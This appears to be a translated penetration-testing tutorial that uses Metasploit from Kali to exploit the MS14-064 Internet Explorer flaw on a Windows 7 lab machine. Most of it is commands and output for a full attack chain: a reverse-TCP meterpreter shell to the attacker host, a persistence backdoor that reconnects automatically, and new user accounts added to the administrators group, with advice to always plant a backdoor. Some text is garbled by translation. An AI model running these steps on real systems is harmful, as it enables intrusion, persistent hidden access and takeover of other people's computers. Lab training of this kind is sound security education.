Create two virtual machines on VMware: win7 and kali.
Kali: It is a Linux distribution operating system. It has more than 300 penetration testing tools, so we don’t need to find the installation package and install it on our own computer. After all, it is not safe to find it from the Internet. It even integrates more than 600 hacking tools, which is very powerful.
It can be used for free forever, and basically learning hacking will use this system.
Target machine: Win7 64位 (IP: 192.168.10.45)--use ipconfig to query.
Attacker: Kali (IP:192.168.10.21)--Use ifconfig to query.
【Help safe learning one by one, where all resources can be obtained one by one】
①Network security learning route
②20 penetration testing e-books
③Security offense and defense 357 pages of notes
④50 security offensive and defensive interview guides
⑤Security Red Team Penetration Toolkit
⑥ Necessary Books on Network Security
⑦100 actual combat cases of vulnerabilities
⑧Internal video resources of major security factories
⑨Analysis of past CTF capture the flag questions
1. Prerequisites for the experimental environment
In win7, close the firewall ("Open Network and Sharing Center" - "Windows Firewall" - "Turn Windows Firewall on or off" - select the off option).
Make sure that the two virtual machines can be pinged (especially ping win7 in kali to see if they can be connected).$ping 192.168.10.45
2. Open the Metasploit penetration tool
Metasploit is an open source security vulnerability detection tool, msfconsole is used to start msf terminal:
>msfconsole
copy code
**Result:** Entered successfully, enter the "msf6>" mode
3. View the vulnerabilities that need to be exploited
Search for the vulnerability, numbered MS14-064.
MS14-064 is a Windows OLE Automation Array Remote Code Execution Vulnerability. A remote code execution vulnerability exists when Internet Explorer fails to access objects in memory. OLE (Object Linking and Embedding) is a technology that allows applications to share data and functionality. A remote attacker can exploit this vulnerability to execute arbitrary code through a constructed website that allows remote code execution when viewed by a user using the IE browser.
[ Supplement : Microsoft’s vulnerability number naming format for Windows system vulnerabilities is: MS14-064;
The abbreviation of MS Micosoft, in a fixed format; 14 indicates the year, that is, the vulnerability released in 2014; 064 indicates the order, that is, the 64th vulnerability released in that year.
>search ms14-064
copy code
**Result:** It can be seen that multiple pieces of exploitable vulnerability module information are returned
4. Try to use one of the vulnerable modules to attack
Use one of the vulnerabilities to attack the module-0 module, attack and enter the module ( note : it must be "_", not "-", otherwise an error will be reported).
>use exploit/windows/browser/ms14_064_ole_code_execution
copy code
**Result: **Successfully switched to this module--”msf6 exploit(windows/browser/ms14_064_ole_code_execution)>“
And it prompts “no payload configured,defaulting to windows/meterpreter/reverse_tcp”--that no payload is configured, the default is windows/meterpreter/reverse_tcp
5. View the parameters required by the vulnerable module
After entering the vulnerability module, first check the parameters of the test module. Similar to when you use a software to attack, do you need to configure some simple parameters first? You need to tell the software who you want to attack. This is the most basic. Therefore, to configure, you must first check all Which parameters can be configured.
>show options
copy code
**Result:** Among them, if the value displayed by required is yes, it means that it is an item that must be set; if the value displayed is no, it means that it is an item that must not be set;
Focus on the 6 parameter configurations, whichever one needs to be set:
Payload (attack vector - use the default windows/meterpreter/reverse_tcp);
SRVHOST (file sharing server-kali address);
SRVPORT (the port of the file sharing server - just use the port obtained by default);
LHOST (address of launching the attack - kali address);
LPORT (the port where the attack is launched - use the port obtained by default);
AllowPowershellPrompt (enable browser plugin, default is false)
[ Supplementary explanation:
1) The Payload contains malicious code that needs to be run in the remote system. Payload is a special module that can run as a vulnerability exploit module and exploit the security holes in the target system to carry out attacks. That is, the exploit module has access to the target system, and the code in it defines the behavior of the Payload in the target system.
2) Payload modules mainly have the following three types: -Single -Stager -Stage
Single is a completely independent Payload, and its purpose is simple, but it is easy to be caught.
Stager is a payload that establishes a network connection between the targeted user and the attacker and downloads additional components or applications. A common Stagers Payload is reverse_tcp, which allows the target system to establish a tcp connection (3-way handshake-4-way wave) with the attacker (it is a TCP-based reverse link rebound shell, which is very stable to use).
Stage is a Payload component downloaded by Stager Payload. This Payload can provide more advanced functions and has no size limit.
3) windows/x64/meterpreter/reverse_tcp consists of a Stager Payload (reverse_tcp) and a Stage Payload (meterpreter).
Note: The Payload is windows/meterpreter/reverse_tcp. The control channel meterpreter obtained by default is 32 bits.
If you want to change the control channel meterpreter obtained later to 64-bit, set it. payload:windows/x64/meterpreter/reverse_tcp
6. Set up a file sharing server
It is found that SRVHOST is empty and needs to be set. Others (payload/SRVPORT/LHOST/LPORT)have been obtained and are correct. Set the corresponding parameter address of SRVHOST, which refers to the address of the file sharing server. Think about it, who should be set to it? Why?
Analyze: Where is this file sharing server used? Will it generate a URL, induce users to click, and then directly connect to the host that launched the attack. So who do you think should generate this connection? Is it the user? Or the attacker's side? It must be the attacker's side, we don't know who will click on this website link.
Therefore, we will set the address of this file sharing server to the address of kali
>set SRVHOST 192.168.10.21
copy code
7. Open the browser plug-in
The default parameter of AllowPowershellPrompt should be changed from false to true, because the vulnerability in msf is to use exp to call powershell (powershell is a command shell and scripting environment), so the exp code of msf is only for systems with powershell installed take effect.
>set AllowPowershellPrompt true
copy code
8. Check again
Check whether the modification to SRVHOST and AllowPowershellPrompt is successful
>show options
copy code
9. After the check is correct, launch an attack
>run
copy code
**Result:** Generate a website link “Using URL : http://192.168.10.21:8080/xE6RxjSy, start the service, the cursor stays here, waiting for someone to click on the website link.
10. Open the website link
In win7, open the website link in the IE browser: http://192.168.10.21:8080/xE6RxjSy, it will prompt whether to allow opening a file, after selecting "Allow", the session connection can be triggered.
**Result 1:** After opening the link in win7, there will be no feedback.
**Result 2:**Since the website link is triggered to open in win7, then in kali, a session connection will be triggered, and the result shows that 192.168.10.45 (target host win7) tried to click on the website link, so, Kali used the MS14-064 vulnerability module to launch an attack on the target host. Finally, “meterpreter session 1 opened”--it showed that the session connection 1 of 192.168.10.21:4444 and 192.168.10.45:49191 had been opened.
Generally, it will automatically enter the control channel meterpreter, interactive mode, indicating that the attack is successful.
Notice:
Once a session connection is opened, if the system does not automatically enter the control channel, you can try to press Enter to perform a manual connection.
1) Manually view the currently existing sessions
Note that under the directory msf>, manually view the currently existing sessions.
**Result:** Currently there is only session connection 1, the type of connection established by meterpreter is x86--32 bit (set by the payload in the module), and the basic information and connection information of the target host 192.168.10.45 are displayed.
>sessions
copy code
2) Select to connect to the currently opened session 1
>sessions -i 1
copy code
**Result:** Successfully entered the control channel meterpreter, interactive mode, indicating that the attack was successful.
11. Implanting a backdoor program
After kali controls win7, a backdoor program is generated on the target host through persistence, so that the subsequent intrusion will no longer be performed through the MS14-064 vulnerability, but the host will be invaded through this backdoor file [note that it is under the control channel meterpreter >】.
Note: Because this MS14-064 vulnerability is easy to be repaired , once the target host regularly repairs the vulnerability, the intrusion path through the MS14-064 vulnerability will become invalid , but the implanted backdoor program is not easy to be discovered and repaired , so once the intrusion is successful, it is recommended to try to implant a backdoor program.
Implant a fixed backdoor program through persistence (supports multiple ways to start) , set related parameters, and set the connection address and port number.
>run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21
copy code
Focus on 6 parameter configurations:
-S: This program is automatically loaded when the system starts (because the backdoor program cannot be found by the target user, and there is no need for the target host to click
Click to start, so the program needs to have the function of automatic loading);
-U: This program is automatically loaded when the user logs in;
-X: Automatically load this program when booting;
-i: After automatic loading, the time interval of the connection back, that is, how many seconds the backdoor tries to connect to the connection back address every second;
-r: After automatic loading, the host address of the connection back, who is the connection back to, naturally the address of the intruded kali;
-p: After automatic loading, the port number of the connection back, that is, the port number of the kali address, can be set at will in theory, but the range should not exceed 65535, and
It cannot be set to a common special port number;
**Result 1:** Prompted in kali, a backdoor program yqLAOjt.vbs is successfully generated, it will be connected back after automatic loading , and saved in the directory 192.168.10.21:40000of the target host win7 .C:\Users\18044\AppData\Local\Temp\
[**Note: **payload is automatically set to “windows/meterpreter/reverse_tcp”, LHOST is set to 192.168.10.21,LPORT设置为40000]
**Result 2:** In the C:\Users\18044\AppData\Local\Temp\ directory in win7, the backdoor program yqLAOjt.vbs implanted from the attacking host kali was successfully found
[Supplementary knowledge points:
1) Port number range: 0~65535
2) List of common port numbers
12. Suspend the current session
After successfully implanting the backdoor program, we also need to verify the backdoor program to verify whether the target host win7 can be successfully invaded through the backdoor program, so we can first suspend the current session connection opened through the MS14-064 vulnerability (background) or disconnect (exit), both
meterpreter>background
copy code
**Result: **Successfully suspend session 1 to the background without disconnecting, and successfully switch to the msf > directory
13. Open the monitoring module
To use the backdoor program to attack, you need to open a monitoring module, which can rebound the shell monitoring module, attack, and enter the module
>use exploit/multi/handler
copy code
**Result: **Successfully switched to this module--”msf6 exploit(multi/handler)>“
and prompt “Using configured payload generic/shell_reverse_tcp”--to usepayload为generic/shell_reverse_tcp
14. View the parameters required by the monitoring module
After entering the monitoring module, first check the parameters of the module. Similar to when you use a software to attack, do you need to configure some simple parameters first? You need to tell the software who you want to attack. This is the most basic. Therefore, to configure, you must first check all What parameters can be configured?
>show options
copy code
**Result:** Among them, if the value displayed by required is yes, it means that it is an item that must be set; if the value displayed is no, it means that it is an item that must not be set;
Focus on the 3 parameter configurations, whichever one needs to be set:
Payload: attack vector;
LHOST: link back address;
LPORT: the connection port number;
15. Set the attack vector, connection address and port number
Because the monitoring module we want to open is specifically for real-time monitoring of the yqLAOjt. achieve accurate monitoring
The parameters for making yqLAOjt.vbs before are:
"run persistence -S -U -X -i 5 -p 40000 -r 192.168.10.21"
copy code
Therefore, we also need to keep the attack vector Payload of the monitoring module consistent with the payload of the backdoor program:
>set payload windows/meterpreter/reverse_tcp
copy code
The callback address LHOST of the monitoring module needs to be consistent with the LHOST of the backdoor program:
>set LHOST 192.168.10.21
copy code
The port number LPORT of the callback address of the monitoring module needs to be consistent with the LPORT of the backdoor program:
>set LPORT 40000
copy code
16. Check again
>show options
copy code
17. After the check is correct, launch an attack
>run
copy code
**Result: **Enable the targeted 192.168.10.21:40000monitoring mode, because the yqLAOjt.vbs backdoor program has been set to automatically load, so once the monitoring module is enabled, feedback information will be connected back immediately 192.168.10.21:40000.
Finally, “meterpreter session 2 opened”--it indicates the opened 192.168.10.21:40000和192.168.10.45:49227session connection 2.
Generally, it will automatically enter the control channel meterpreter, interactive mode, indicating that the attack is successful.
[ Note:
At this point, suspend the currently opened session --background, and then check the current existing session --sessions, and you will get the connection information of the two sessions that have been opened. It is necessary to distinguish the two session connections and make them clear , the first session connection is opened through the MS14-064 vulnerability, and the second session connection is opened through the backdoor program
18. Create user and set password
1) Get the shell permission, get the console permission, and you can get the system consoleC:\Windows\system32
meterpreter>shell
copy code
2) After entering, there may be garbled characters, so solve the problem of garbled characters
C:\Windows\system32>chcp 65001
copy code
3) Display all users in win7 system
C:\Windows\system32>net user
copy code
4) Create a user
Create a user, the user name is test, the password is test [net user user name password/add]
C:\Windows\system32>net user test test /add
copy code
You can also not set a password, just create a passwordless user named test1 [net user username/add]
C:\Windows\system32>net user test1 /add
copy code
**Result 1:**In kali, if the result shows “the commad completed successfully”—means "command executed successfully", the user is created successfully;
If the result shows— “system error 5 has occurred;access is denied”"system error 5 occurred; access is denied"—represents a problem with insufficient permissions, and you need to elevate your privileges by **, you can use bypassuac or Windows kernel vulnerabilities to elevate your privileges
**Result 2:** In win7, "Control Panel" --- "Add or delete user accounts", view the successfully newly created user test (standard user - password protection), test1 (standard user - no password)
5) Add new users to the administrator group--elevate to administrator privileges【net localgroup administrators 用户名 /add】
C:\Windows\system32>net localgroup adminis trators test1 /add
copy code
**Result 1:**In kali, the display “the commad completed successfully”- means "command executed successfully", successfully added to the administrator group, and the administrator privilege was successfully elevated;
**Result 2:** In win7, "Control Panel" --- "Add or Delete User Accounts", view the newly created user test1. The user was promoted from the previous "Standard User" to "Administrator", and the privilege was elevated successfully.
